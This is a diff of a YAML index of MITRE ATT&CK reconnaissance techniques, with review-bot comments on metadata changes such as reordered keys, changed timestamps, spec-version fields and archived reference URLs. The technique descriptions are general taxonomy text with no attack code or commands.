- 'Application Log: Application Log Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
+ created: '2020-10-02T16:51:50.306Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1594
+ external_id: T1594
+ - source_name: Perez Sitemap XML 2023
+ description: Adi Perez. (2023, February 22). How Attackers Can Misuse Sitemaps
+ to Enumerate Users and Discover Sensitive Information. Retrieved July 18,
+ 2024.
+ url: https://medium.com/@adimenia/how-attackers-can-misuse-sitemaps-to-enumerate-users-and-discover-sensitive-information-361a5065857a
+ - source_name: Comparitech Leak
+ description: Bischoff, P. (2020, October 15). Broadvoice database of more
+ than 350 million customer records exposed online. Retrieved October 20,
+ 2020.
+ url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
+ - source_name: Register Robots TXT 2015
+ description: Darren Pauli. (2015, May 19). Robots.txt tells hackers the places
+ you don't want them to look. Retrieved July 18, 2024.
+ url: https://www.theregister.com/2015/05/19/robotstxt/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1596.001:
technique:
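Review bot: most of this hunk is key reordering rather than content (`type`, `id`, `created`, `created_by_ref` and `external_references` move below `x_mitre_data_sources`; `url` and `external_id` swap places under `source_name: mitre-attack`), which means the index inherits whatever key order the upstream bundle uses and every upstream reorder shows up as churn here. Emitting with sorted keys would make these diffs show only the real changes: the new `revoked: false`, `x_mitre_attack_spec_version: 3.2.0`, and the two added references `Perez Sitemap XML 2023` and `Register Robots TXT 2015` that the new description paragraph cites.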
@@ -56123,7 +56833,7 @@ reconnaissance:
url: https://www.circl.lu/services/passive-dns/
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:49:13.409Z'
name: DNS/Passive DNS
description: |-
Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.
@@ -56139,8 +56849,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591.003:
technique:
@@ -56162,7 +56870,7 @@ reconnaissance:
url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
Personal Voicemail Transcripts. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:38:31.983Z'
name: Identify Business Tempo
description: |-
Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.
@@ -56178,8 +56886,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1592.001:
technique:
@@ -56205,7 +56911,7 @@ reconnaissance:
url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:32:10.810Z'
name: 'Gather Victim Host Information: Hardware'
description: |-
Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).
@@ -56223,13 +56929,11 @@ reconnaissance:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1592.001
atomic_tests: []
T1598.003:
technique:
- modified: '2024-04-19T13:26:16.082Z'
+ modified: '2024-05-31T04:18:44.567Z'
name: Spearphishing Link
description: |-
Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -56285,7 +56989,7 @@ reconnaissance:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: TrendMictro Phishing
description: Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved
October 20, 2020.
@@ -56336,7 +57040,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1590.004:
technique:
@@ -56357,7 +57060,7 @@ reconnaissance:
- source_name: DNS Dumpster
url: https://dnsdumpster.com/
description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:33:02.476Z'
name: Network Topology
description: |-
Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.
@@ -56373,8 +57076,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590.003:
technique:
@@ -56396,7 +57097,7 @@ reconnaissance:
url: https://www.slideshare.net/rootedcon/carlos-garca-pentesting-active-directory-forests-rooted2019
description: García, C. (2019, April 3). Pentesting Active Directory Forests.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:34:22.917Z'
name: Network Trust Dependencies
description: |-
Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.
@@ -56412,8 +57113,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1597.001:
technique:
@@ -56435,7 +57134,7 @@ reconnaissance:
url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
Intelligence Feeds. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:45:30.862Z'
name: Threat Intel Vendors
description: |-
Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds)
@@ -56451,12 +57150,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1589:
technique:
- modified: '2024-04-19T04:27:00.005Z'
+ modified: '2024-09-16T16:09:45.794Z'
name: Gather Victim Identity Information
description: |-
Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, security question responses, etc.) as well as sensitive details such as credentials or multi-factor authentication (MFA) configurations.
@@ -56496,8 +57193,8 @@ reconnaissance:
external_id: T1589
- source_name: OPM Leak
description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
- Retrieved October 20, 2020.
- url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+ Retrieved September 16, 2024.
+ url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
- source_name: Detectify Slack Tokens
description: Detectify. (2016, April 28). Slack bot token leakage exposing
business critical information. Retrieved October 19, 2020.
@@ -56542,11 +57239,10 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T13:37:31.317Z'
name: Vulnerability Scanning
description: |-
Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.
@@ -56586,9 +57282,8 @@ reconnaissance:
url: https://owasp.org/www-project-automated-threats-to-web-applications/assets/oats/EN/OAT-014_Vulnerability_Scanning
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1596:
technique:
@@ -56650,7 +57345,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595:
technique:
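Review bot: after this change `x_mitre_attack_spec_version` is present with different values for different objects (`2.1.0` kept here for T1596, `3.1.0` for T1598.004, `3.2.0` for T1595.002) and absent entirely for the objects where the earlier hunks removed it alongside `spec_version`. That mix is consistent with a source bundle that only stamps the field on objects touched since it was introduced, but any consumer of this index that reads the field must treat it as optional; if something in the repo keys on it, it needs a default.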
@@ -56676,7 +57370,7 @@ reconnaissance:
url: https://wiki.owasp.org/index.php/OAT-004_Fingerprinting
description: OWASP Wiki. (2018, February 16). OAT-004 Fingerprinting. Retrieved
October 20, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T20:58:13.661Z'
name: Active Scanning
description: |-
Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.
@@ -56697,8 +57391,6 @@ reconnaissance:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1589.002:
technique:
@@ -56763,7 +57455,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1598.004:
technique:
@@ -56811,7 +57502,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1590.006:
technique:
@@ -56833,7 +57523,7 @@ reconnaissance:
url: https://nmap.org/book/firewalls.html
description: Nmap. (n.d.). Chapter 10. Detecting and Subverting Firewalls
and Intrusion Detection Systems. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:31:54.275Z'
name: Network Security Appliances
description: |-
Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.
@@ -56849,34 +57539,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593.002:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
- type: attack-pattern
- created: '2020-10-02T16:50:12.809Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1593.002
- url: https://attack.mitre.org/techniques/T1593/002
- - source_name: SecurityTrails Google Hacking
- url: https://securitytrails.com/blog/google-hacking-techniques
- description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
- Retrieved October 20, 2020.
- - source_name: ExploitDB GoogleHacking
- url: https://www.exploit-db.com/google-hacking-database
- description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
- October 23, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T19:19:47.758Z'
name: Search Engines
description: |-
Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
@@ -56885,15 +57551,38 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.0'
+ type: attack-pattern
+ id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
+ created: '2020-10-02T16:50:12.809Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1593/002
+ external_id: T1593.002
+ - source_name: SecurityTrails Google Hacking
+ description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
+ Retrieved September 12, 2024.
+ url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
+ - source_name: ExploitDB GoogleHacking
+ description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
+ October 23, 2020.
+ url: https://www.exploit-db.com/google-hacking-database
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591.002:
technique:
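Review bot: the `SecurityTrails Google Hacking` reference keeps its `source_name` and its Borges description but now points at `https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks` instead of `securitytrails.com`. Keeping the `source_name` unchanged is correct, since the description text at the top of this technique still reads `(Citation: SecurityTrails Google Hacking)` and renaming the key would break that link; the new URL should be spot-checked once for the same article, as the retrieved date was updated to `September 12, 2024`.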
@@ -56915,7 +57604,7 @@ reconnaissance:
url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
Personal Voicemail Transcripts. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:36:58.964Z'
name: Business Relationships
description: |-
Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.
@@ -56931,8 +57620,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593.003:
technique:
@@ -56993,29 +57680,10 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1589.003:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
- type: attack-pattern
- created: '2020-10-02T14:57:15.906Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1589.003
- url: https://attack.mitre.org/techniques/T1589/003
- - source_name: OPM Leak
- url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
- description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
- Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-16T16:09:45.795Z'
name: Employee Names
description: |-
Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.
@@ -57024,15 +57692,34 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.0'
+ type: attack-pattern
+ id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
+ created: '2020-10-02T14:57:15.906Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1589/003
+ external_id: T1589.003
+ - source_name: OPM Leak
+ description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
+ Retrieved September 16, 2024.
+ url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1592.004:
technique:
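Review bot: the OPM Leak reference is rewritten to a Wayback snapshot (`https://web.archive.org/web/20230602111604/...`) with its retrieval date moved to September 16, 2024, and the entry gains `revoked: false`, `x_mitre_deprecated: false` and `x_mitre_attack_spec_version: 3.2.0` in place of the deleted 2.1.0; that is consistent with a regeneration from the current upstream bundle. The context line above the first hunk still shows the preceding entry at `x_mitre_attack_spec_version: 3.0.0`, so the file now carries a per-technique mix of spec versions, and any consumer that reads that field once per file rather than per entry should be checked.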
@@ -57058,7 +57745,7 @@ reconnaissance:
url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:35:09.668Z'
name: Client Configurations
description: |-
Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.
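Review bot: `modified` for T1592.004 moves backwards, from '2022-04-25T14:00:00.188Z' to '2021-10-17T16:35:09.668Z', and the same backward move from that 2022-04-25 batch timestamp recurs later in the patch for T1596.004, T1591, T1590, T1592.003, T1592.002, T1593.001, T1591.004, T1596.005, T1591.001 and T1598.001 (T1595.003 similarly goes from '2022-05-24T14:00:00.188Z' to '2022-04-15T19:10:23.838Z'). That is plausible if upstream reverted a mass-touch timestamp, but tooling that compares `modified` to decide whether an entry needs reprocessing will now see these as older than what it already has; the commit message should state which upstream ATT&CK release the index was regenerated from.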
@@ -57076,47 +57763,10 @@ reconnaissance:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1598.002:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Philip Winther
- - Sebastian Salla, McAfee
- - Robert Simmons, @MalwareUtkonos
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
- type: attack-pattern
- created: '2020-10-02T17:08:57.386Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1598.002
- url: https://attack.mitre.org/techniques/T1598/002
- - source_name: Sophos Attachment
- url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
- description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
- links – when phishers bring along their own web pages. Retrieved October
- 20, 2020.'
- - source_name: GitHub Phishery
- url: https://github.com/ryhanson/phishery
- description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
- 23, 2020.
- - source_name: Microsoft Anti Spoofing
- url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
- description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
- Retrieved October 19, 2020.
- - source_name: ACSC Email Spoofing
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- description: Australian Cyber Security Centre. (2012, December). Mitigating
- Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-05-31T04:18:44.568Z'
name: Spearphishing Attachment
description: |-
Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -57125,19 +57775,55 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Philip Winther
+ - Sebastian Salla, McAfee
+ - Robert Simmons, @MalwareUtkonos
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor for suspicious email activity, such as numerous
accounts receiving messages from a single unusual/unknown sender. Filtering
based on DKIM+SPF or header analysis can help detect when the email sender
is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
+ created: '2020-10-02T17:08:57.386Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1598/002
+ external_id: T1598.002
+ - source_name: ACSC Email Spoofing
+ description: Australian Cyber Security Centre. (2012, December). Mitigating
+ Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ - source_name: Sophos Attachment
+ description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
+ links – when phishers bring along their own web pages. Retrieved October
+ 20, 2020.'
+ url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
+ - source_name: Microsoft Anti Spoofing
+ description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
+ Retrieved October 19, 2020.
+ url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
+ - source_name: GitHub Phishery
+ description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
+ 23, 2020.
+ url: https://github.com/ryhanson/phishery
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1596.004:
technique:
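Review bot: the ACSC Email Spoofing reference now points to a Wayback snapshot (`https://web.archive.org/web/20210708014107/...`) but keeps 'Retrieved October 19, 2020', whereas the OPM Leak entry earlier in the patch received a fresh retrieval date when it was archived; fine if this mirrors upstream verbatim, otherwise the two should be handled the same way (the same URL swap with the unchanged date appears again for T1598 further down). The reference list is also reordered (ACSC, Sophos, Microsoft, Phishery) and each entry now lists `description` before `url`, the same reorder noise as in the T1589.003 hunks.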
@@ -57160,7 +57846,7 @@ reconnaissance:
description: Swisscom & Digital Shadows. (2017, September 6). Content Delivery
Networks (CDNs) Can Leave You Exposed – How You Might Be Affected And What
You Can Do About It. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:47:55.905Z'
name: CDNs
description: |-
Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.
@@ -57176,8 +57862,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591:
technique:
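Review bot: for T1596.004 both `spec_version` and `x_mitre_attack_spec_version: 2.1.0` are deleted and, unlike T1589.003 and T1598.002, nothing in the visible hunks re-adds `x_mitre_attack_spec_version`; the same removal-only pattern appears for T1591, T1590, T1592.003, T1592.002, T1593.001, T1591.004, T1596.005 and T1591.001. Confirm that the field is re-added elsewhere in each of those entries, outside the shown context, or that nothing reads it, since the entries that were fully rewritten carry `3.2.0` and T1595.003 and T1590.001 visibly keep `2.1.0`.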
@@ -57203,7 +57887,7 @@ reconnaissance:
url: https://www.sec.gov/edgar/search-and-access
description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
27, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-27T15:37:09.343Z'
name: Gather Victim Org Information
description: |-
Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.
@@ -57219,8 +57903,6 @@ reconnaissance:
x_mitre_version: '1.1'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590:
technique:
@@ -57248,7 +57930,7 @@ reconnaissance:
url: https://www.circl.lu/services/passive-dns/
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:34:23.229Z'
name: Gather Victim Network Information
description: |-
